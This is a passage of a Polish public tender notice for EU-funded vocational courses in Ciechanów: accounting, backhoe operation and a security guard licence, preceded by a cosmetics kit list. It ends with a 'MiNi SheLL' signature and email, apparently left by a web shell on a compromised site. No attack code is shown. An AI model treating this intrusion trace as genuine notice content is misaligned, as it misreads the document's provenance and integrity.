Szczoteczka do rzęs - 1 szt.	Blok polerski biały 100/100 - 1 szt.
Szczoteczka do brwi i grzebyk - 1 szt.	Patyczki z drzewa pomarańczowego - 5 szt.
Penseta kosmetyczna do regulacji brwi - 1 szt.	Cleaner - płyn do przemywania masy żelowej 100 ml -  1 szt.
Paleta cieni - 1 szt. (24 kolory)	Tips off - płyn do zdejmowania tipsów 100 ml - 1 szt.
Eyeliner czarny - 1 szt.	Brush cleaner - płyn do czyszczenia pędzelków 100 ml - 1 szt.
Konturówka do oczu  (+ ew. temperówka),
	Waciki bezpyłowe - 250 szt.
Tusz do rzęs - 2 kolory,	Najwyższej jakości pędzelek do nakładania żelu - włosie Toray - 1 szt.
	Oliwka do skórek 15 ml - 1 szt.
	Primer - wytrawiacz 6 ml - 1 szt.
	Cuticle remover - preparat do usuwania skórek 6ml -
1 szt.
	Miseczka do manicure
	Cążki do wycinania skórek
	Kopytko ze stali chirurgicznej
	Karuzela pełna ozdób - 1 szt.
	Korektor lakieru w pisaku (wymienne końcówki) - 1 szt.
	Lakier - liner z cienkim pędzelkiem - 1 szt.
	Lakier podkładowy - 1 szt.
	Lakier utwardzający - 1 szt.
	Komplet lakierów do paznokci - różne kolory - 10 szt.
	Wysuszacz  lakieru - 1 szt.
	Lakier żelowy UV TOP/BASE (2 w 1) - 6 ml
	Lakier żelowy UV kolor -  2 szt. - 6 ml
	Odżywka keratyna ew. jedwabna - 1 szt.
	Bezacetonowy zmywacz do paznokci - 1 szt.
	Preparat odtłuszczający - 1 szt.
7)	informować o finansowaniu realizacji projektu przez Unię Europejską poprzez zamieszczenie 
w dokumentacji kursowej informacji o udziale Unii Europejskiej, a także oznakowania miejsca 
realizacji kursu, zgodnie z wymogami Rozporządzenia Rady (WE) nr 1083/2006 z dnia 11 lipca 2006 r. ustanawiającego przepisy ogólne dotyczące Europejskiego Funduszu Rozwoju Regionalnego, Europejskiego Funduszu Społecznego oraz Funduszu Spójności (Dz. Urz. UE L 210/25 z 31.07.2006) oraz Rozporządzenia Komisji WE nr 1828/2006 ustanawiającego szczegółowe zasady wykonania Rozporządzenia Rady WE nr 1083/2006 (Dz. Urz. UE L 371/1 z 27.12.2006) i wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki 2007 - 2013.
8)	zapewnić uczestnikom kursu warunki do nauki zgodne z zasadami BHP.
9)	 przeprowadzić wśród uczestników zajęć ocenę merytoryczną i techniczną przebiegu kursu, m. in. na podstawie formularza ankiety oceniającej i przedstawić jej wyniki Zamawiającemu.
10)	prowadzić odpowiednią dokumentację składającą się co najmniej z:
a)	dziennika zajęć;
b)	imiennej listy obecności uczestników kursu (w każdym dniu kursu);
c)	imiennej listy, na której uczestnicy kursu będą potwierdzać otrzymanie materiałów dydaktycznych i startera;
d)	imiennej listy, na której uczestnicy kursu będą potwierdzać odbiór cateringu (w każdym dniu kursu);
11)	wystawić zaświadczenia o ukończeniu przez każdego z uczestników kursu.
12)	Niezwłocznie, nie później jednak niż w ciągu 24 godzin od zdarzenia, poinformować 	Zamawiającego o:
a)	nie zgłaszaniu się uczestników;
b)	przerwaniu kursu lub rezygnacji uczestnika;
c)	innych sytuacjach, które mogą mieć wpływ na realizację programu kursu i umowy.
13)	przekazać Zamawiającemu, w terminie do 7 dni od dnia zakończenia kursu, następujących dokumentów:
a)	dziennika zajęć;
b)	imiennej listy obecności uczestników kursu (w każdym dniu kursu);
c)	imiennej listy, na której uczestnicy kursu będą potwierdzać otrzymanie materiałów dydaktycznych 	i startera;
d)	imiennej listy, na której uczestnicy kursu będą potwierdzać odbiór cateringu (w każdym dniu 	kursu);
e)	zaświadczeń o ukończeniu przez uczestników kursu;
f)	ankiet oceniających przeprowadzonych wśród uczestników kursu,
g)	dowodu ubezpieczenia uczestników na czas trwania kursu.
14)	 Przechowywać dokumenty potwierdzające realizację przedmiotowego kursu do dnia 
31.12.2020 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.08.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zorganizowanie i przeprowadzenie kursu księgowości komputerowej dla 3 osób niepełnosprawnych, mieszkańców powiatu ciechanowskiego - uczestników projektu Aktywność szansą na zatrudnienie i usamodzielnienie współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zorganizowanie i przeprowadzenie kursu księgowości komputerowej dla 3 osób niepełnosprawnych, mieszkańców powiatu ciechanowskiego - uczestników projektu Aktywność szansą na zatrudnienie i usamodzielnienie współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.

Program zajęć teoretycznych i praktycznych ma obejmować łącznie 150 godzin lekcyjnych (80 godzin zajęć teoretycznych i 70 godzin zajęć praktycznych). 
Zajęcia muszą odbywać się w dni robocze (od poniedziałku do piątku) w mieście Ciechanów. 
	Szkoleniem należy objąć tematykę z zakresu: rachunkowości, sprawozdawczości, prawa podatkowego, prawa ubezpieczeń społecznych, podstaw prawa pracy i obsługi komputerowego programu księgowego np. komputerowa książka przychodów i rozchodów.

Wykonawca zobowiązany jest:
1)	Opracować program kursu i przedłożyć go Zamawiającemu w dniu składania ofert wraz 
		z ofertą jako załącznik do niej.
		Program musi zawierać:
a)	nazwę i zakres kursu,
b)	czas trwania kursu (daty i godziny)
c)	plan nauczania, określający zakres tematyczny zajęć i ich wymiar,
d)	cele kursu  (przewidywane efekty).
2)	Zapewnić prowadzenie szkolenia przez osoby o odpowiednich kwalifikacjach -
	w uzasadnionych przypadkach za pisemną zgodą Zamawiającego w trakcie szkolenia może 	nastąpić zmiana osób prowadzących szkolenie,
3)	zapewnić uczestnikom kursu materiały dydaktyczne (w tym co najmniej: notes, długopis,  		skrypt/podręcznik), które staną się własnością uczestników kursu,
4)	zapewnić salę wykładową oraz sprzęt komputerowy dla każdego uczestnika kursu, 
5)	zapewnić każdemu uczestnikowi catering każdego dnia kursu (tj. dwudaniowy obiad - 		zupa i drugie danie, kawę, herbatę, wodę mineralną gazowaną i niegazowaną, ciastka, 		ciasto, owoce),
6)	ubezpieczyć 3 uczestników  na czas trwania kursu,
7)	informować o finansowaniu realizacji projektu przez Unię Europejską poprzez 	zamieszczenie w dokumentacji kursowej informacji o udziale Unii Europejskiej, a także 	oznakowania miejsca realizacji kursu, zgodnie z wymogami Rozporządzenia Rady (WE) 	nr 1083/2006 z dnia 11 lipca 2006 r. ustanawiającego przepisy ogólne dotyczące 	Europejskiego Funduszu Rozwoju Regionalnego, Europejskiego Funduszu Społecznego
	oraz Funduszu Spójności (Dz. Urz. UE L 210/25 z 31.07.2006) oraz Rozporządzenia
	Komisji WE nr 1828/2006 ustanawiającego szczegółowe zasady wykonania 	Rozporządzenia Rady WE nr 1083/2006 (Dz. Urz. UE L 371/1 z 27.12.2006) i 	wytycznymi
	dotyczącymi oznaczania projektów w ramach Programu Operacyjnego	Kapitał Ludzki 
  2007 - 2013.
8)	zapewnić uczestnikom kursu warunki do nauki w oparciu o zasady BHP,
9)	zorganizować i przeprowadzić egzamin wewnętrzny i wydać zaświadczenia o ukończeniu 		kursu zgodnie ze wzorem MEN
10)	przeprowadzić wśród uczestników kursu ocenę merytoryczną i techniczną  przebiegu 	kursu, m. in. na podstawie formularza ankiety oceniającej i przedstawić jej wyniki 	Zamawiającemu.
11)	prowadzić odpowiednią dokumentację:
a)	dziennik zajęć,
b)	imienną listę obecności uczestnika  (w każdym dniu kursu),
c)	imienną listę, na której uczestnicy kursu będą potwierdzać otrzymanie materiałów 			dydaktycznych;
d)	imienną  listę , na której uczestnicy kursu  będą potwierdzać korzystanie z cateringu 			(w każdym dniu kursu);
e)	indywidualne karty przeprowadzonych zajęć w części teoretycznej i praktycznej dla 
		każdego uczestnika    kursu;
f)	protokołu i karty oceny z okresowych sprawdzianów efektów kształcenia oraz egzaminu 		końcowego, jeżeli zostały przeprowadzone ;
g)	przedłożyć dowód ubezpieczenia 2 uczestników na czas trwania kursu,
h)	wystawić zaświadczenia  o ukończeniu  kursu.
12)	Niezwłocznie, nie później jednak niż w ciągu 24 godzin od zdarzenia, poinformować 			Zamawiającego o:
a)	nie zgłaszaniu się uczestników na kurs,
b)	przerwaniu kursu lub rezygnacji uczestnika,
c)	innych sytuacjach, które mogą mieć wpływ na realizację programu kursu  i umowy.
13)	przekazać Zamawiającemu, w terminie do 7 dni od dnia zakończenia kursu, następujące 			dokumenty:
a)dziennik zajęć,
b)	imienną  listę obecności uczestnika  (w każdym dniu kursu),
c)	imienną listę, na której uczestnicy kursu  potwierdzali otrzymanie materiałów dydaktycznych,
d) imienną listę, na której uczestnicy kursu potwierdzali korzystanie z cateringu 
	(w każdym dniu kursu),
e) kserokopie indywidualnych kart przeprowadzonych zajęć w części teoretycznej 
	i praktycznej dla każdego uczestnika kursu,
f)  zaświadczeń o ukończeniu przez uczestników kursu,
g)  kserokopie dowodu ubezpieczenia uczestników na czas  trwania kursu,
h) kserokopie zaświadczeń o ukończeniu kursu,
i)  ankiety oceniające kurs przeprowadzone wśród uczestników.
14)	przechowywać dokumenty potwierdzające realizację  kursu do dnia 31.12.2020 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.11.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zorganizowanie i przeprowadzenie kursu na operatora koparko-ładowarki kl. III dla 3 osób, w tym: 2 usamodzielnianych wychowanków z zastępczych form opieki oraz 1 osoby przebywającej w rodzinnej pieczy zastępczej, mieszkańców powiatu ciechanowskiego - uczestników projektu Aktywność szansą na zatrudnienie i usamodzielnienie współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zorganizowanie i przeprowadzenie kursu na operatora koparko-ładowarki kl. III dla 3 osób,w tym: 2 usamodzielnianych wychowanków z zastępczych form opieki oraz 1 osoby przebywającej w rodzinnej pieczy zastępczej, mieszkańców powiatu ciechanowskiego - uczestników projektu Aktywność szansą na zatrudnienie i usamodzielnienie współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego

Celem szkolenia jest przygotowanie uczestników do uzyskania kwalifikacji w zawodzie operatora koparko - ładowarki w zakresie III klasy uprawnień.
Program zajęć teoretycznych i praktycznych ma obejmować łącznie 202 godziny.                
Plan nauczania powinien obejmować nie mniej niż 25 godzin zegarowych  w tygodniu.
Szkolenie musi zostać zorganizowane zgodnie z Rozporządzeniem Ministra Gospodarki                  z dnia 20 września 2001 r. w sprawie bezpieczeństwa i higieny pracy podczas eksploatacji maszyn i innych urządzeń technicznych do robót ziemnych, budowlanych i drogowych 
(Dz. U. z 2001 r. Nr 118 poz. 1263).
Zajęcia muszą odbywać się w dni robocze (od poniedziałku do piątku) w mieście Ciechanów w budynku o lokalizacji dogodnej dla osób dojeżdżających z terenu Powiatu Ciechanowskiego (położonego nie dalej niż 400 m od najbliższego przystanku komunikacji miejskiej).
Wykonawca zobowiązany jest:
1)	Opracować program kursu i przedłożyć go Zamawiającemu w dniu składania ofert wraz 
	z ofertą jako załącznik do niej.
	Program musi zawierać:
a)	nazwę i zakres kursu,
b)	podanie adresu miejsca, gdzie odbywać się będzie kurs, 	
c)	czas trwania kursu (daty i godziny)
d)	plan nauczania, określający zakres tematyczny zajęć i ich wymiar,
e)	cele kursu  (przewidywane efekty).
2)	zapewnić prowadzenie szkolenia przez osoby o odpowiednich kwalifikacjach -
	w uzasadnionych przypadkach za pisemną zgodą Zamawiającego w trakcie szkolenia może 	nastąpić zmiana osób prowadzących szkolenie,
3)	opłacić i zorganizować egzamin końcowy zewnętrzny przed komisją powołaną przez 	Instytut Mechanizacji Budownictwa i Górnictwa Skalnego w Warszawie, zgodnie 
	z Rozporządzeniem Ministra Gospodarki z dnia 20.09.2001 roku, w sprawie 	bezpieczeństwa i higieny pracy podczas eksploatacji maszyn i innych urządzeń 	technicznych do robót ziemnych, budowlanych i drogowych (Dz. U. Nr 118 poz. 	1263),
4)	zapewnić uczestnikom kursu materiały dydaktyczne (w tym co najmniej: notes, długopis,  	skrypt/podręcznik), które staną się własnością uczestników kursu,
5)	zapewnić do zajęć praktycznych sprzęt adekwatny do przedmiotu zamówienia 	umożliwiający realizację szkolenia, do zajęć teoretycznych salę wykładową wyposażoną 	w co najmniej 3 stanowiska dla uczestników szkolenia, sprzęt niezbędny w zakresie 	realizacji tematyki szkolenia,  
6)	zapewnić każdemu uczestnikowi catering każdego dnia kursu podczas zajęć teoretycznych 	(tj. dwudaniowy obiad - zupa i drugie danie, kawę, herbatę, wodę mineralną gazowaną 
	i 	niegazowaną, ciastka, ciasto, owoce),
7)	ubezpieczyć 3 uczestników  na czas trwania kursu,
8)	informować o finansowaniu realizacji projektu przez Unię Europejską poprzez 	zamieszczenie w dokumentacji kursowej informacji o udziale Unii Europejskiej, a także 	oznakowania miejsca realizacji kursu, zgodnie z wymogami Rozporządzenia Rady (WE) 	nr 1083/2006 z dnia 11 lipca 2006 r. ustanawiającego przepisy ogólne dotyczące 	Europejskiego Funduszu Rozwoju Regionalnego, Europejskiego Funduszu Społecznego 		oraz Funduszu Spójności (Dz. Urz. UE L 210/25 z 31.07.2006) oraz Rozporządzenia 	Komisji WE nr 1828/2006 ustanawiającego szczegółowe zasady wykonania 	Rozporządzenia Rady WE nr 1083/2006 (Dz. Urz. UE L 371/1 z 27.12.2006) i 	wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego 	Kapitał Ludzki 2007 - 2013.
9)	zapewnić uczestnikom kursu   warunki do nauki w oparciu o zasady BHP,
10)	przeprowadzić wśród uczestników kursu ocenę merytoryczną i techniczną  przebiegu 	kursu, m. in. na podstawie formularza ankiety oceniającej i przedstawić jej wyniki 	Zamawiającemu.
11)	prowadzić odpowiednią dokumentację:
a)	dziennik zajęć,
b)	imienną listę obecności uczestnika  (w każdym dniu kursu),
c)	imienną listę, na której uczestnicy kursu będą potwierdzać otrzymanie materiałów 		dydaktycznych;
d)	imienną  listę , na której uczestnicy kursu  będą potwierdzać korzystanie z cateringu 		(w każdym dniu kursu);
e)	indywidualne karty przeprowadzonych zajęć w części teoretycznej i praktycznej dla 
	każdego uczestnika    kursu;
f)	protokołu i karty oceny z okresowych sprawdzianów efektów kształcenia oraz egzaminu końcowego, jeżeli zostały przeprowadzone ;
12)	przedłożyć dowód ubezpieczenia 3 uczestników na czas trwania kursu,
13)	wystawić zaświadczenia  o ukończeniu  kursu.
14)	Niezwłocznie, nie później jednak niż w ciągu 24 godzin od zdarzenia, poinformować 		Zamawiającego o:
a)	nie zgłaszaniu się uczestników na kurs,
b)	przerwaniu kursu lub rezygnacji uczestnika,
c)	innych sytuacjach, które mogą mieć wpływ na realizację programu kursu  i umowy.
15)	przekazać Zamawiającemu, w terminie do 7 dni od dnia zakończenia kursu, następujące 		dokumenty:
a)	dziennik zajęć,
b)	imienną  listę obecności uczestnika  (w każdym dniu kursu),
c)	imienną listę, na której uczestnicy kursu  potwierdzali otrzymanie materiałów dydaktycznych,
d) imienną listę, na której uczestnicy kursu potwierdzali korzystanie z cateringu 
	(w każdym dniu kursu),
e) kserokopie indywidualnych kart przeprowadzonych zajęć w części teoretycznej 
	i praktycznej dla każdego uczestnika kursu,
f)  zaświadczeń o ukończeniu przez uczestników kursu,
g)  kserokopie  dowodu  wniesienia opłaty za egzamin końcowy zewnętrzny za każdego 	uczestnika kursu,
j)  kserokopie dowodu ubezpieczenia uczestników na czas  trwania kursu,
k) kserokopie zaświadczeń o ukończeniu kursu,
l)  ankiety oceniające kurs przeprowadzone wśród uczestników.
16)	przechowywać dokumenty potwierdzające realizację  kursu do dnia 31.12.2020 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.11.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zorganizowanie i przeprowadzenie kursu ochrony osób i mienia I stopnia dla 1 osoby - usamodzielnianej wychowanki z zastępczych form opieki, mieszkanki powiatu ciechanowskiego - uczestniczki projektu Aktywność szansą na zatrudnienie 
i usamodzielnienie współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zorganizowanie i przeprowadzenie kursu ochrony osób i mienia I stopnia dla 
1 osoby - usamodzielnianej wychowanki z zastępczych form opieki, mieszkanki powiatu ciechanowskiego - uczestniczki projektu Aktywność szansą na zatrudnienie 
i usamodzielnienie współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.

Program zajęć teoretycznych i praktycznych ma obejmować łącznie 245 godzin lekcyjnych. Zajęcia muszą odbywać się w dni robocze (od poniedziałku do piątku) w mieście Ciechanów. 
Szkolenie należy zrealizować w oparciu o przepisy ustawy z dnia 22 sierpnia 1997 r.   o ochronie osób i mienia (Dz.U. z 2005 r. Nr 145, poz. 1221 z późn, zm.), rozporządzenia Ministra Spraw Wewnętrznych i Administracji z dnia 7 września 2010 r. w sprawie wymagań, jakim powinna odpowiadać ochrona wartości pieniężnych przechowywanych                                i transportowanych przez przedsiębiorców i inne jednostki organizacyjne (Dz. U. z 2010 r.          Nr 166, poz. 1128 z późn. zm.) oraz inne akty prawne z zakresu przedmiotu zamówienia.

Wykonawca zobowiązany jest:
1)	Opracować program kursu i przedłożyć go Zamawiającemu w dniu składania ofert wraz 
	z ofertą jako załącznik do niej.
	Program musi zawierać:
a)	nazwę i zakres kursu,
b)	podanie adresu miejsca, gdzie odbywać się będzie kurs, 
c)	czas trwania kursu (daty i godziny)
d)	plan nauczania, określający zakres tematyczny zajęć i ich wymiar,
e)	cele kursu  (przewidywane efekty).
2)	Zapewnić prowadzenie szkolenia przez osoby o odpowiednich kwalifikacjach -
	w 	uzasadnionych przypadkach za pisemną zgodą Zamawiającego w trakcie szkolenia 	może nastąpić zmiana osób prowadzących szkolenie,
3)	zapewnić uczestnikowi kursu materiały dydaktyczne (w tym co najmniej: notes, długopis,  		skrypt/podręcznik), które staną się własnością uczestnika kursu,
4)	zapewnić podczas zajęć praktycznych sprzęt i akcesoria adekwatne do tematyki szkolenia 		(np. kajdanki, broń, tarcze strzelnicze, tonfy treningowe, sprzęt ratownictwa medycznego - 		fantomy, maski, itp.), 
5)	zapewnić salę do zajęć z samoobrony, strzelnicę do zajęć strzeleckich,
6)	zapewnić uczestnikowi catering każdego dnia kursu podczas zajęć teoretycznych 
	(tj. dwudaniowy obiad - zupa i drugie danie, kawę, herbatę, wodę mineralną gazowaną 
	i 	niegazowaną, ciastka, ciasto, owoce),
7)	opłacić i zorganizować egzamin państwowy na licencję I stopnia pracownika fizycznej 		ochrony osób i mienia
8)	ubezpieczyć uczestnika  na czas trwania kursu,
9)	informować o finansowaniu realizacji projektu przez Unię Europejską poprzez 	zamieszczenie w dokumentacji kursowej informacji o udziale Unii Europejskiej, a także 	oznakowania miejsca realizacji kursu, zgodnie z wymogami Rozporządzenia Rady (WE) 	nr 1083/2006 z dnia 11 lipca 2006 r. ustanawiającego przepisy ogólne dotyczące 	Europejskiego Funduszu Rozwoju Regionalnego, Europejskiego Funduszu Społecznego 	oraz Funduszu Spójności (Dz. Urz. UE L 210/25 z 31.07.2006) oraz Rozporządzenia 	Komisji WE nr 1828/2006 ustanawiającego szczegółowe zasady wykonania 	Rozporządzenia Rady WE nr 1083/2006 (Dz. Urz. UE L 371/1 z 27.12.2006) i 	wytycznymi 	dotyczącymi oznaczania projektów w ramach Programu Operacyjnego	Kapitał Ludzki 
  2007 - 2013.
10)	zapewnić uczestnikowi kursu warunki do nauki w oparciu o zasady BHP,
11)	przeprowadzić wśród uczestników kursu ocenę merytoryczną i techniczną  przebiegu 	kursu, m. in. na podstawie formularza ankiety oceniającej i przedstawić jej wyniki 	Zamawiającemu.
12)	prowadzić odpowiednią dokumentację:
a)	dziennik zajęć,
b)	imienną listę obecności uczestnika  (w każdym dniu kursu),
c)	imienną listę, na której uczestnik kursu będzie potwierdzać otrzymanie materiałów 			dydaktycznych;
d)	imienną  listę , na której uczestnik kursu będzie potwierdzać korzystanie z cateringu 		(w każdym dniu kursu);
e)	indywidualne karty przeprowadzonych zajęć w części teoretycznej i praktycznej dla 
		każdego uczestnika kursu;
f)	protokołu i karty oceny z okresowych sprawdzianów efektów kształcenia oraz egzaminu 		końcowego, jeżeli zostały przeprowadzone;
g)	przedłożyć dowód ubezpieczenia uczestnika na czas trwania kursu,
h)	wystawić zaświadczenia  o ukończeniu  kursu.
13)	Niezwłocznie, nie później jednak niż w ciągu 24 godzin od zdarzenia, poinformować 		Zamawiającego o:
a)	nie zgłaszaniu się uczestnika na kurs,
b)	przerwaniu kursu lub rezygnacji uczestnika,
c)	innych sytuacjach, które mogą mieć wpływ na realizację programu kursu  i umowy.
14)	przekazać Zamawiającemu, w terminie do 7 dni od dnia zakończenia kursu, następujące dokumenty:
a)	dziennik zajęć,
b)	imienną  listę obecności uczestnika  (w każdym dniu kursu),
c)	imienną listę, na której uczestnik kursu  potwierdził otrzymanie materiałów dydaktycznych,
d) imienną listę, na której uczestnik kursu potwierdzał korzystanie z cateringu 
	(w każdym dniu kursu),
e) kserokopie indywidualnych kart przeprowadzonych zajęć w części teoretycznej 
	i praktycznej dla uczestnika kursu,
f)  zaświadczeń o ukończeniu przez uczestnika kursu,
g)  kserokopie  dowodu  wniesienia opłaty za egzamin końcowy zewnętrzny uczestnika kursu,
j)  kserokopie dowodu ubezpieczenia uczestnika na czas  trwania kursu,
k) kserokopie zaświadczeń o ukończeniu kursu,
l)  ankiety oceniające kurs przeprowadzone wśród uczestnika.
15)	przechowywać dokumenty potwierdzające realizację  kursu do dnia 31.12.2020 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.11.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com